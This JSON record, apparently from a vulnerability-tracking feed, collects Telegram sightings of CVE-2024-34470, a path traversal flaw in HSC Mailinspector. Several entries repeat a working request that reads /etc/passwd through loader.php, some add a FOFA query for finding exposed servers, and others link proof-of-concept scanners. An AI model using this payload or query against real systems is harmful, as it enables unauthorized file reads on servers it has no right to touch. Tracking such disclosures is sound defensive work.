{"vulnerability": "cve-2024-34470", "sightings": [{"uuid": "cf1d4706-a0fb-4125-87c5-e4977c41c1d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7710", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC and bulk scanner for CVE-2024-34470\nURL\uff1ahttps://github.com/bigb0x/CVE-2024-34470\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-19T11:36:16.000000Z"}, {"uuid": "ebece8c6-043f-435c-a47c-f30e724d9782", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7746", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-34470 : An Unauthenticated Path Traversal Vulnerability in HSC Mailinspector\nURL\uff1ahttps://github.com/th3gokul/CVE-2024-34470\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-23T03:22:40.000000Z"}, {"uuid": "57473150-9ec6-4055-91ec-c9269e871106", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "seen", "source": "https://t.me/TheDarkWebInformer/17205", "content": "CVE-2024-34470: Path Traversal vulnerability in HSC Mailinspector\n\nCredit: youtube.com/@brutsecurity/", "creation_timestamp": "2025-05-13T19:03:06.000000Z"}, {"uuid": "32eb2242-a499-44a8-9f2a-af604f32cb20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "Telegram/Rc4aowQ97LYVVQDGxjBnVNF9nlBdJPyzpxpsubjMvnRZHA", "content": "", "creation_timestamp": "2024-06-12T15:51:16.000000Z"}, {"uuid": "cdd93784-fcf4-4f16-b464-f2526452c585", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "Telegram/yPYr0DasaZkkHrbr-hd2EaUFfatAxAgNbVitVrHRDWk2cg", "content": "", "creation_timestamp": "2024-06-19T16:43:11.000000Z"}, {"uuid": "774d5be6-129d-4804-ba74-91adb8edbf0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2655", "content": "CVE-2024-34470\n\nGET   /mailinspector/public/loader.php?path=../../../../../../../etc/passwd\n\n#poc  #exploit", "creation_timestamp": "2024-06-12T15:56:04.000000Z"}, {"uuid": "c96d724a-1fe9-49ea-b1b0-4e33bc6d539d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2685", "content": "CVE-2024-34470\n\nGET   /mailinspector/public/loader.php?path=../../../../../../../etc/passwd\n\n#exploit #poc", "creation_timestamp": "2024-06-19T15:42:16.000000Z"}, {"uuid": "05a11c0c-44c7-4f0e-a982-1b2eeb1c4d9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/1196", "content": "https://github.com/Mr-r00t11/CVE-2024-34470", "creation_timestamp": "2024-06-20T23:43:07.000000Z"}, {"uuid": "5b419d66-2075-4fe6-b84e-d77067b58459", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/1194", "content": "\ud83d\udea8POC RELEASED\ud83d\udea8CVE-2024-34470 \"A critical vulnerability has been found in HSC Mailinspector up to version 5.2.18. This vulnerability affects an unknown functionality of the file /public/loader.php. Manipulating the 'path' argument with an unknown input leads to a path traversal vulnerability. According to CWE, this issue is classified as CWE-22.\n\nThe product uses external input to construct a pathname intended to identify a file or directory located beneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location outside of the restricted directory. This affects confidentiality, integrity, and availability.\"\n\nhttps://x.com/DarkWebInformer/status/1803905811229352212", "creation_timestamp": "2024-06-20T23:41:59.000000Z"}, {"uuid": "8442cfb4-aa91-421f-aaf7-6b5a6cfce133", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/darkcommunityofficial/1030", "content": "CVE-2024-34470 HSC MailInspector\n*\nPOC:\nGET   /mailinspector/public/loader.php?path=../../../../../../../etc/passwd\n\nFOFA:\ntitle==\"..:: HSC MailInspector ::..\"", "creation_timestamp": "2024-06-20T01:17:39.000000Z"}, {"uuid": "c988c176-d015-4ace-bede-767eeba9c217", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/CipherAgents/1306877", "content": "CVE-2024-34470 HSC MailInspector\n\nPOC:\nGET   /mailinspector/public/loader.php?path=../../../../../../../etc/passwd\n\nFOFA:\ntitle==\"..:: HSC MailInspector ::..\"\n\n#\ud835\ude4f\ud835\ude40\ud835\ude3c\ud835\ude48_\ud835\ude41\ud835\ude4e\ud835\ude40\ud835\ude3e #\ud835\ude4f\ud835\ude40\ud835\ude3c\ud835\ude48_\ud835\ude44\ud835\ude49\ud835\ude3f", "creation_timestamp": "2024-07-05T07:47:22.000000Z"}, {"uuid": "7c873d24-14f4-4cd6-b05a-222abf4e74a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2125", "content": "CVE-2024-34470 HSC MailInspector\n*\nPOC:\nGET   /mailinspector/public/loader.php?path=../../../../../../../etc/passwd\n\nFOFA:\ntitle==\"..:: HSC MailInspector ::..\"", "creation_timestamp": "2024-06-19T09:56:32.000000Z"}, {"uuid": "7a4ef464-d217-4d5a-bbe7-cf9ccf302461", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "Telegram/QibJsYL0eBhpoxhmaVTLg5u9toELdHUjfLp1DtbVaDJ7_HE", "content": "", "creation_timestamp": "2024-07-05T07:14:04.000000Z"}]}